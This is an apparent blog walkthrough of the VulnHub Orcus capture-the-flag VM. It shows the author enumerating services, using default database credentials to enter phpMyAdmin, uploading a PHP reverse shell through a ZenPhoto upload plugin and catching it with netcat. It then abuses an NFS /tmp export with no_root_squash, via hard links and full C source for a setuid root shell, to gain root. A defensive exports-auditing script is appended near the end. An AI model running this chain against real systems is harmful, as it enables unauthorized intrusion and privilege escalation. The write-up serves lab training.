VulnHub Orcus Solution

For background information on this series of CTFs you may want to read this page. Or if you're just after my solution please keep reading.



This is the last of 3 incrementally difficult CTFs created for HackFest 2016 by @ViperBlackSkull and released on the VulnHub platform.


Difficulty - Hard

My Solution

As always, start with an Nmap scan to see what ports are open.

root@Kali:~/orcus# nmap -p- -Pn -A -v -oX orcus_nmap.xml
Starting Nmap 7.40 ( ) at 2017-03-23 13:14 GMT
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:14
Completed Parallel DNS resolution of 1 host. at 13:14, 0.00s elapsed
Initiating SYN Stealth Scan at 13:14
Scanning [65535 ports]
Discovered open port 993/tcp on
Discovered open port 53/tcp on
Discovered open port 110/tcp on
Discovered open port 445/tcp on
Discovered open port 111/tcp on
Discovered open port 443/tcp on
Discovered open port 995/tcp on
Discovered open port 139/tcp on
Discovered open port 143/tcp on
Discovered open port 80/tcp on
Discovered open port 22/tcp on
Discovered open port 51994/tcp on
Discovered open port 44123/tcp on
Discovered open port 43229/tcp on
Discovered open port 54377/tcp on
Discovered open port 2049/tcp on

Looks very similar to the last two with a couple of extra services running.

Port 80 is showing the standard splash screen.

I started Nikto in the background and started looking at the service enumeration results.

Everything looked pretty standard except port 443 wasn't HTTP or HTTPS; it was instead another SSH port.

443/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)

Two ports listening for incoming SSH connections seemed a bit odd. There were no banners running on either port, so nothing to really help there.

Nikto was still running so I decided to look at some more services.

The Nmap scripts show that Samba is running and accepting guest logons.

Host script results:
|_clock-skew: mean: 55m03s, deviation: 0s, median: 55m03s
| nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ORCUS<00>            Flags: <unique><active>
|   ORCUS<03>            Flags: <unique><active>
|   ORCUS<20>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: \x00
|   NetBIOS computer name: ORCUS\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-23T10:22:12-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

enum4linux is a tool on Kali for enumerating SMB services. There are no open shares or vulnerabilities on this version, but there is a list of users and groups. The most interesting element is:

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\kippo (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

Kippo is a medium-interaction SSH honeypot and I have spent a lot of time using this tool :) This also explains the two SSH ports.

NFS is also open so let's see if there are any shares on here. Nmap includes some useful scripts for enumerating open NFS shares.

root@Kali:~/orcus# nmap --script nfs-*
Starting Nmap 7.40 ( ) at 2017-03-23 14:15 GMT
Nmap scan report for
Host is up (0.11s latency).
Not shown: 988 closed ports
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
| nfs-ls: Volume /tmp
|   access: Read Lookup Modify Extend Delete NoExecute
| ??????????  ?    ?    ?     ?                    .
| rwxr-xr-x   0    0    4096  2016-10-31T03:05:46  ..
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .ICE-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .Test-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .X11-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .XIM-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .font-unix
| rwx------   0    0    4096  2017-03-23T08:43:01  systemd-private-337e8f7600944b7db31c3b6535178cce-dovecot.service-fW3Ids
| rwx------   0    0    4096  2017-03-23T08:42:58  systemd-private-337e8f7600944b7db31c3b6535178cce-systemd-timesyncd.service-Ql58io
| rwx------   0    0    4096  2017-03-23T08:42:59  vmware-root
| nfs-showmount: 
|_  /tmp *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /tmp        7608792.0  3621728.0  3577516.0  51%   8.0T         32000

Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds

/tmp on the target is exported as a share that we can reach. It looks like we can read and write but not execute. I test this by mounting the share on my local host and creating a file. (You may need to apt-get install nfs-common.)

root@Kali:~/orcus# mkdir nfsmount
root@Kali:~/orcus# mount -t nfs nfsmount
root@Kali:~/orcus# cd nfsmount
root@Kali:~/orcus/nfsmount# ls
systemd-private-b912b13f08a547cca382811da93446e3-dovecot.service-3Oo1yR            vmware-root
root@Kali:~/orcus/nfsmount# echo 'test' > test.txt
root@Kali:~/orcus/nfsmount# ls
systemd-private-b912b13f08a547cca382811da93446e3-dovecot.service-3Oo1yR            test.txt
systemd-private-b912b13f08a547cca382811da93446e3-systemd-timesyncd.service-QJasTL  vmware-root

Doesn't seem to be much more we can gather from this, so I head back to my Nikto results, which have just finished.

There is a lot of information in here. The robots.txt file had 30 entries which caused some noise. I started going through all the results with some interesting finds.

  • Multiple index files found: /index.html, /index.php

index.html is our splash screen; index.php shows an error message about a database being offline.

This also identifies the software in use as Exponent CMS, which we could also gather from the other results in nikto.

* Entry '' in robots.txt returned a non-forbidden or redirect HTTP code (200)

This was also repeated for other files like and By looking at these files we can determine the version number is most likely 2.0.

Searchsploit returned a few potential vulnerabilities that could be of use, but the files were either missing from the install or, as it was not configured for DB access, there was no valid SQL injection.

* /phpmyadmin/: phpMyAdmin directory found

There is an installation of phpMyAdmin but no version numbers listed anywhere. I tried a few known exploits but nothing worked, so I started to expand my search. I wondered what else might be installed, so I threw dirbuster at the web server.

My first scan with dirbuster is always a fast scan with NO recursion. Some web apps have deep directories and they can take a long time to scan. If I want to scan recursively I do it per folder by setting the "Dir to start with" field.

Much the same as Nikto found, but we also found a backup folder that says it contains ssh-creds.bak.

Trying to read the creds file results in a 403 Forbidden response, but the SimplePHPQuiz-Backup.tar.gz file is accessible.

After saving and extracting the archive I start navigating the source code. I find a db_conn.php file that looks like it still contains the default configuration.

<?php
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

// The leading @ suppresses the PHP warning if the connection fails
@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){
    echo "Could not connect to MySql. Please try again";
}


I try these creds in the logon form for phpMyAdmin and success, I'm in. This account has full privileges, the same as the MySQL root account.

I try to read and write files out to get more information or create a php shell but the MySQL Server has been started with increased security preventing this.

Let's see what else we have.

Most of the tables are empty.

The zencart database is populated and has admin creds configured. There are vulnerabilities if I can identify the version. To do this I need to figure out the install path. It’s not in any of the tables and dirbuster didn’t find it either.

I try the obvious entries like /zencart/, /cart and /store with no luck. I throw other dictionaries at dirbuster again without success.

Next I look to see if any of the other tables have directories. I have the source for SimplePHPQuiz; maybe there is a vulnerability in there somewhere I can find.

I wasn't far off: as I'm checking the tables I find ZenPhoto 1.4.10 is present on the server but not installed yet.

As luck would have it there is a known vulnerability with this version; all we need to do is install it first.

Configure the SQL DB options with our credentials dbuser / dbpassword, click Save and then Go :) From here just follow the setup steps to get your admin account logged in.

Grab the details of the exploit from searchsploit and test them out.

root@kali:~/Desktop/setec-vpn# searchsploit zenphoto 1.4.10
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                                |  Path
                                                                                                                              | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
ZenPhoto 1.4.10 - Local File Inclusion                                                                                        | php/webapps/38841.txt
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
root@kali:~/Desktop/setec-vpn# searchsploit -p 38841
Exploit: ZenPhoto 1.4.10 - Local File Inclusion
   Path: /usr/share/exploitdb/platforms/php/webapps/38841.txt

Copied EDB-ID 38841's path to the clipboard.

It's a local file include that should be easy to trigger but it just won't work :(

I start thinking of other ways to get files uploaded or php code running on the server. I spot tabs for themes and plugins. These are ideal places to upload and inject php code that I can use to get command line access.

Themes are not editable from the web UI so that's out. At first glance it's the same for plugins: they cannot be edited or uploaded from the web UI, but there are several that are installed but not enabled... including a file uploader.

Enable this and head to the upload page and we can now push up any files we like. I start with my favourite PHP reverse shell from pentestmonkey.

Any files we upload are placed in to and we can browse this folder in the browser and, after starting a netcat listener, open our shell.php page.

root@kali:~/Desktop/setec-vpn# netcat -l -vv -p 1234
listening on [any] 1234 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 39818
Linux Orcus 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:05 UTC 2016 i686 athlon i686 GNU/Linux
 16:03:05 up 45 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Now I have a shell it's on to my usual hands-on routine:

  1. Spawn a tty shell
  2. file listing to web root
  3. Search for flags
  4. upload linux enumeration script.

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Orcus:/$ find / > /var/www/html/dirs.txt
find / > /var/www/html/dirs.txt
www-data@Orcus:/$ grep flag.txt /var/www/html/dirs.txt
grep flag.txt /var/www/html/dirs.txt
www-data@Orcus:/$ cat /var/www/flag.txt
cat /var/www/flag.txt

The benefit of writing dirs.txt to the html dir is that I can download these files with a browser. I could also move these all to /tmp/, where I know I can write and read files using NFS.

After running the Linux enumeration script there are some interesting elements. I confirmed that the Kippo SSH honeypot is running in the background and the real SSH is running on 443.

I check the Kippo logs in case our users accidentally logged in to the honeypot instead of the host device. A mistake I have never made :P Honestly.

There are no logs in the log or tty dir, so I check the config in case they are being written anywhere else. Sadly not, but I did find an extra flag for my troubles.

# Port to listen for incoming SSH connections.
# user:1:TH!SP4SSW0RDIS4Fl4G!

Back to the search for root, and I couldn't find much that helped me. I tried to read the ssh-creds.bak file that had evaded me earlier, but it was write only.

total 224K
d-wx--x--x 15 www-data www-data 4.0K Mar 25 07:15 ..
drwxr-xr-x  2 www-data www-data 4.0K Nov  1 21:33 .
--w-------  1 www-data www-data   12 Nov  1 21:33 ssh-creds.bak
-rw-r--r--  1 www-data www-data 211K Oct 31 20:29 SimplePHPQuiz-Backupz.tar.gz

In a moment of desperation I started throwing random priv esc exploits at the box with no luck.

After a lot of time wandering around the box I started looking for misconfigured services that may have a way in as root. (should have started here really)!

From the list of processes running as root, Samba, NFS and Dovecot look like prime targets.

Starting with samba I had already enumerated a lot of this earlier, so I started checking the smb.conf file for anything out of place.

Everything looked pretty standard.

Next was NFS. Looking in /etc/exports everything seemed to look OK at first glance, but I didn't know a lot about NFS other than setting up some basic exports. So I took to Google. The following posts gave me a lot of information to get started on exploiting NFS.

The first post I started reading was NFS hardlinks from pentestmonkey. Using this technique I could create a hard link from a file into the tmp dir (the export dir) and then view the file on my host from the mounted share.

I figured a good test would be the ssh-creds.bak file.

On the target run:

www-data@Orcus:/etc/kippo$ cd /tmp 
cd /tmp
www-data@Orcus:/tmp$ ln /var/www/html/backups/ssh-creds.bak ssh-creds.bak
ln /var/www/html/backups/ssh-creds.bak ssh-creds.bak

Then from my host I can just browse into the mounted folder and view the files.

root@kali:~/VulnHub/Orcus# mkdir nfsmount
root@kali:~/VulnHub/Orcus# mount -t nfs nfsmount
root@kali:~/VulnHub/Orcus/nfsmount# ls
ssh-creds.bak                                                            systemd-private-337e8f7600944b7db31c3b6535178cce-systemd-timesyncd.service-Ql58io  vmware-root
systemd-private-337e8f7600944b7db31c3b6535178cce-dovecot.service-fW3Ids  test
root@kali:~/VulnHub/Orcus/nfsmount# cat ssh-creds.bak

These are the default creds for kippo so I think I’m being trapped here but I try them on the real ssh port anyway with no success.

At the end of the blog post they suggest that if root_squash is enabled then I should be able to access more privileged files like shadow.

I tried several times without success so I went back to reading up on NFS and exploiting no_root_squash.

The blog posts focused on copying a binary that I could set to run with root privileges regardless of the user that launched the application.

The examples used vi to edit the shadow and passwd files. I couldn’t get them to function. I tried the same technique for the sh file to get a root shell again with no joy. The shell would launch but with my normal permissions.

After trying the examples and failing I moved on to the next technique. This involved compiling your own C code that would start a bash shell. I used the example C code from highoncoffee.

#define _GNU_SOURCE   /* setresuid() is only declared in unistd.h with this; the author compiled without the includes, hence the gcc warnings below */
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setresuid() */
int main(void){
       setresuid(0, 0, 0);   /* real, effective and saved uid to root; only succeeds when the file is setuid root */
       system("/bin/bash");  /* the second call gcc warns about below; starts the shell as root */
       return 0;
}

On my host create the file.

On the target compile the binary:

www-data@Orcus:/tmp$ gcc -o suidbash suidbash.c
gcc -o suidbash suidbash.c
suidbash.c: In function 'main':
suidbash.c:2:8: warning: implicit declaration of function 'setresuid' [-Wimplicit-function-declaration]
        setresuid(0, 0, 0);
suidbash.c:3:8: warning: implicit declaration of function 'system' [-Wimplicit-function-declaration]

On my host set the suid bit:

root@kali:~/VulnHub/Orcus/nfsmount# chown root:root suidbash
root@kali:~/VulnHub/Orcus/nfsmount# chmod u+s suidbash

Back on the target execute the file:

www-data@Orcus:/tmp$ ./suidbash
root@Orcus:/tmp# id
uid=0(root) gid=33(www-data) groups=33(www-data)

And enjoy the root shell goodness that ensues :) It’s important to chown before chmod as chown will remove the suid bit.
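As an added defender-side check, not code from the original post or the VM, this Python script parses /etc/exports entries and flags the combination the hard-link trick and the root shell above depended on: a read-write export of /tmp to any client, plus no_root_squash. The exports content is a constructed sample; the real file on the box is not shown in the post.

```python
"""Audit exports(5) entries for the weaknesses this walkthrough used.

Added example, not from the original post. Flags a wildcard client, a
read-write export, an exported world-writable dir such as /tmp (where hard
links to other files can be planted) and no_root_squash (which lets setuid
files created by client root run as root on the server). Sample is constructed.
"""
import re
# Constructed sample: the first line models the target's "/tmp *" export.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/tmp        *(rw,sync,no_root_squash,no_subtree_check)
/srv/share  192.168.1.0/24(ro,sync,root_squash)
/home/dev   *(rw,sync,root_squash)
"""

# A client spec is "host" or "host(opt,...)"; the space-separated "host (opts)"
# form, which exports to everyone, is left out of this example.
CLIENT_RE = re.compile(r"^(\S+?)(?:\((.*?)\))?$")

def parse_exports(text):
    """Return (path, client, options) for every client spec in the file."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            m = CLIENT_RE.match(spec)
            opts = m.group(2).split(",") if m.group(2) else []
            entries.append((path, m.group(1), opts))
    return entries

def audit_export(path, client, opts):
    """Return the findings for one export; an empty list means nothing flagged."""
    findings = []
    if client == "*":
        findings.append("exported to any client (*)")
    if "rw" in opts:
        findings.append("read-write export")
    if path == "/tmp" or path.startswith("/tmp/"):
        findings.append("world-writable directory exported (hard-link target)")
    if "no_root_squash" in opts:
        findings.append("no_root_squash: client root can plant root-owned setuid files")
    return findings

def audit_exports(text):
    """Map 'path client' -> findings for every export in text."""
    return {f"{p} {c}": audit_export(p, c, o) for p, c, o in parse_exports(text)}

if __name__ == "__main__":
    for export, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(("RISK " if findings else "ok   ") + export + ": " + ("; ".join(findings) or "-"))
```

Run it against the real file with `audit_exports(open("/etc/exports").read())`; mounting exports client-side with `nosuid` is the matching mitigation on the consumer end.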

Now for that root flag to finish it off.

root@Orcus:/tmp# find / -name flag.txt
find / -name flag.txt
root@Orcus:/tmp# cat /root/flag.txt
cat /root/flag.txt

And that completes the series. I had a lot of fun working my way through these and learnt a lot along the way. A big thanks to @ViperBlackSkull for creating the series and of course to @VulnHub for hosting them all.

As usual Questions, Queries, Comments below.